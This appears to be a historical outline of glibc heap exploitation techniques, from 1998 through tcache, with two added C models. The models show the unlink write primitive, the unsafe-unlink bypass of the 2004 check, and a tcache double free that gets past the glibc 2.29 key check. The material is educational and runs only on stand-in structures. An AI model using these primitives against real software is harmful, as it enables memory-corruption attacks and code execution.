- Introduction
- ptmalloc2 Heap Overview
- The Classical Era
- The Original Poison Null Byte
- Bugtraq Mailing List, October 1998
- Widely considered unexploitable, but patched anyway.
- 'Vudo Malloc Tricks' and 'Once Upon A Free'
- Unlink and Frontlink Techniques
- Phrack 57, August 2001
- Fixed in late 2004
- People mostly believed that the patch killed the technique.
- After a few years, people started exploiting a variant of the technique.
- A modified version of the Unlink technique is still viable.
- Trend: a patch removes a technique, only for a variant of it to remain exploitable.
- Advanced Doug Lea's Malloc Exploits
- Phrack 61, August 2003
- Exploiting the Wilderness
- Bugtraq Mailing List, February 2004
- The Malloc Maleficarum
- Bugtraq Mailing list, October 2005
- Revised version of House of Lore killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- House of Spirit still exploitable.
- House of Force finally killed by the top chunk size check ("malloc(): corrupted top size"), committed in August 2018 and shipped in glibc 2.29 (released February 2019)
- The use of 'set_head' to Defeat The Wilderness
- Phrack 64, May 2007
- Yet Another free() Exploitation Technique
- Phrack 66, November 2009
- The Malloc Des-Maleficarum
- Phrack 66, November 2009
- The House of Lore: Reloaded
- Phrack 67, November 2010
- The Renaissance: CTFs cause Heap Exploitation to go 'Sicko Mode'
- Unsafe Unlink, 2014 Edition
- HITCON CTF, August 2014
- Killed by introduction of tcache for tcache-sized chunks; still exploitable if glibc is built with tcache disabled, or with chunks larger than the tcache range (0x410 bytes by default) that still go through unlink().
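The unlink() primitive behind the Phrack 57 technique, the late-2004 "corrupted double-linked list" check that was believed to have killed it, and the 2014 variant that satisfies that check, as an added C model that is not code from the original page or from glibc. The chunk layout mirrors ptmalloc2's 64-bit header; the stand-in GOT slot, shellcode buffer and the global pointer table `ptrs` are constructed for this example. It leaves out the size/prev_size forgery that makes free() call unlink() on the fake chunk in a real exploit and only shows why each unlink succeeds or fails.

```c
#include <stddef.h>
#include <stdio.h>

/* Model of a ptmalloc2 chunk header (64-bit field layout). */
struct malloc_chunk {
    size_t prev_size;
    size_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
};

/* Phrack 57 era unlink(): trusts fd/bk blindly, so a corrupted chunk yields
 * two mirrored writes, fd->bk = bk and bk->fd = fd. */
static void unlink_2001(struct malloc_chunk *p)
{
    struct malloc_chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Late-2004 glibc unlink(): refuses unless both neighbours point back at p.
 * glibc aborts with "corrupted double-linked list"; the model returns -1. */
static int unlink_2004(struct malloc_chunk *p)
{
    struct malloc_chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Constructed stand-ins for the classic targets: a GOT slot and a shellcode buffer. */
static struct malloc_chunk *fake_got_slot;
static _Alignas(16) unsigned char fake_shellcode[64];

static void forge_classic_chunk(struct malloc_chunk *victim)
{
    /* fd->bk must land on the GOT slot, so fd = slot - offsetof(bk). */
    victim->fd = (struct malloc_chunk *)((char *)&fake_got_slot - offsetof(struct malloc_chunk, bk));
    /* bk is the value written into the slot. The mirror write bk->fd = fd lands
     * at shellcode+16, which is why 2001-era shellcode opened with a short jump
     * over those bytes. */
    victim->bk = (struct malloc_chunk *)fake_shellcode;
}

/* Classic 2001 attack: returns 1 if the GOT slot now points at the shellcode. */
int classic_unlink_attack(void)
{
    struct malloc_chunk victim = {0};
    forge_classic_chunk(&victim);
    unlink_2001(&victim);
    return fake_got_slot == (struct malloc_chunk *)fake_shellcode;
}

/* The same forged chunk against the 2004 check: returns 1 if it is rejected. */
int classic_attack_rejected_in_2004(void)
{
    struct malloc_chunk victim = {0};
    forge_classic_chunk(&victim);
    return unlink_2004(&victim) == -1;
}

/* 2014 variant (HITCON 2014 style): the program keeps user pointers in a global
 * table, so a fake chunk placed in chunk 3's user data can set fd and bk such
 * that fd->bk and bk->fd both alias ptrs[3], which already holds its address.
 * Returns the value left in ptrs[3] after the "safe" unlink succeeds. */
static struct malloc_chunk *ptrs[5];

struct malloc_chunk *unsafe_unlink_2014(void)
{
    static struct malloc_chunk fake;   /* stands in for chunk 3's user data */
    ptrs[3] = &fake;
    fake.fd = (struct malloc_chunk *)((char *)&ptrs[3] - offsetof(struct malloc_chunk, bk));
    fake.bk = (struct malloc_chunk *)((char *)&ptrs[3] - offsetof(struct malloc_chunk, fd));
    if (unlink_2004(&fake) != 0)
        return NULL;
    /* ptrs[3] now equals fd, i.e. &ptrs[0]: the next write "into chunk 3"
     * rewrites the pointer table, the arbitrary-write primitive of the 2014 technique. */
    return ptrs[3];
}

int main(void)
{
    printf("2001 unlink redirects GOT slot: %d\n", classic_unlink_attack());
    printf("2004 check rejects that chunk:  %d\n", classic_attack_rejected_in_2004());
    printf("2014 variant passes the check:  %d\n",
           unsafe_unlink_2014() == (struct malloc_chunk *)&ptrs[0]);
    return 0;
}
```

The 2004 check only asks whether the neighbours point back at the chunk; it cannot tell whether those back-pointers are legitimate list links or a global that happens to hold the same address, which is the gap the 2014 edition exploits. With tcache, the point of the caveat above is simply that the chunk has to be large enough to reach this code path at all.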
- Poison NULL byte, 2014 Edition
- Google Project Zero, August 2014
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Overlapping Chunks
- Glibc Adventures - The Forgotten Chunks, February 2015
- House of Orange
- HITCON CTF, October 2016
- "The attack vector of this technique was removed by changing the behavior of malloc_printerr in glibc 2.26"
- House of Einherjar
- Code Blue Conference, November 2016
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Unsorted Bin Free Chunk Arbitrary Pointer Leak
- 0CTF, November 2016
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Unsorted Bin Free Chunk Arbitrary Write
- Couldn't Find Origin
- tcache introduces additional constraints
- House of Rabbit
- Hatena Blog, September 2017
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- Large Bin Attack
- 0CTF, November 2018
- Killed by introduction of tcache, still exploitable if glibc is built with tcache disabled.
- The Dark Age: The Introduction of tcache
- Introduced in glibc 2.26
- Killed a lot of techniques, introduced some new avenues for attack.
- Internals
- tcache dup
- Introduced in glibc 2.26
- Killed in glibc 2.29 by the tcache double-free check (the `key` field added to tcache_entry)
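The tcache internals behind the "tcache dup" entry above, as an added C model that is not glibc's code or the original page's: a single tcache bin, the 2.26 free path with no double-free check, the 2.29 path with the `key` check, and why that check still fails when the attacker can write to the freed chunk. The names `bin`, `free_226`, `free_229` and the entries `a` are constructed for this model; a real tcache_perthread_struct holds 64 bins.

```c
#include <stddef.h>
#include <stdio.h>

#define TCACHE_MAX_COUNT 7      /* glibc default tcache_count per bin */

struct tcache_bin;

/* Header written into the user data of a chunk sitting in tcache. glibc 2.26
 * only had `next`; 2.29 added `key`, pointing at the thread's tcache struct. */
struct tcache_entry {
    struct tcache_entry *next;
    struct tcache_bin *key;
};

/* One size class is enough for the demo. */
struct tcache_bin {
    struct tcache_entry *head;
    unsigned count;
};

static struct tcache_bin bin;   /* stands in for tcache_perthread_struct */

static void tcache_reset(void) { bin.head = NULL; bin.count = 0; }

static void tcache_put(struct tcache_entry *e)
{
    e->next = bin.head;
    e->key = &bin;               /* 2.29+: mark the entry as owned by this tcache */
    bin.head = e;
    bin.count++;
}

static struct tcache_entry *tcache_get(void)
{
    struct tcache_entry *e = bin.head;
    if (e == NULL) return NULL;
    bin.head = e->next;
    e->key = NULL;               /* 2.29+: cleared when the chunk is handed out */
    bin.count--;
    return e;
}

/* glibc 2.26-2.28 free(): no double-free check on the tcache path. */
static int free_226(struct tcache_entry *e)
{
    if (bin.count < TCACHE_MAX_COUNT) { tcache_put(e); return 0; }
    return 1;                    /* bin full: would fall through to fastbin/unsorted */
}

/* glibc 2.29+ free(): if key says "already in tcache", walk the bin and abort
 * with "free(): double free detected in tcache 2" on a hit (-1 here). */
static int free_229(struct tcache_entry *e)
{
    if (e->key == &bin)
        for (struct tcache_entry *t = bin.head; t != NULL; t = t->next)
            if (t == e)
                return -1;
    return free_226(e);          /* key matched by coincidence: proceed as before */
}

/* tcache dup on 2.26: free the same chunk twice, then two allocations of that
 * size return the same pointer. Returns 1 if the dup worked. */
int tcache_dup_226(void)
{
    static struct tcache_entry a;   /* first 16 bytes of a chunk's user data */
    tcache_reset();
    free_226(&a);
    free_226(&a);
    return tcache_get() == &a && tcache_get() == &a;
}

/* The same double free on 2.29 is caught. Returns 1 if detected. */
int tcache_dup_229_detected(void)
{
    static struct tcache_entry a;
    tcache_reset();
    free_229(&a);
    return free_229(&a) == -1;
}

/* The check trusts a field stored in attacker-reachable memory: a use-after-free
 * write over the second qword of the freed chunk clears the key and the double
 * free goes through again. Returns 1 if the dup works despite the 2.29 check. */
int tcache_dup_229_key_overwrite(void)
{
    static struct tcache_entry a;
    tcache_reset();
    free_229(&a);
    a.key = NULL;                /* UAF write clobbering the key */
    if (free_229(&a) != 0)
        return 0;
    return tcache_get() == &a && tcache_get() == &a;
}

int main(void)
{
    printf("2.26 tcache dup works:           %d\n", tcache_dup_226());
    printf("2.29 detects the double free:    %d\n", tcache_dup_229_detected());
    printf("2.29 bypassed via key overwrite: %d\n", tcache_dup_229_key_overwrite());
    return 0;
}
```

The key overwrite works because, up to glibc 2.33, the key is just the tcache pointer; from 2.34 glibc stores a random per-process `tcache_key` instead, so the same use-after-free write must first leak that value before it can put the chunk back in the bin.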
- Modern Techniques
- Overlapping Chunks 2: Nonadjacent Free Chunk Consolidation Attack
- fastbin dup
- fastbin dup into stack
- fastbin dup consolidate
- tcache Poisoning
- tcache House of Spirit
- House of Botcake
- House of Fun
- PoC||GTFO 0x18, 2018
- House of Roman
- DEFCON 26, April 2018
- Archeap Fuzzer
- Conclusions
- Works Cited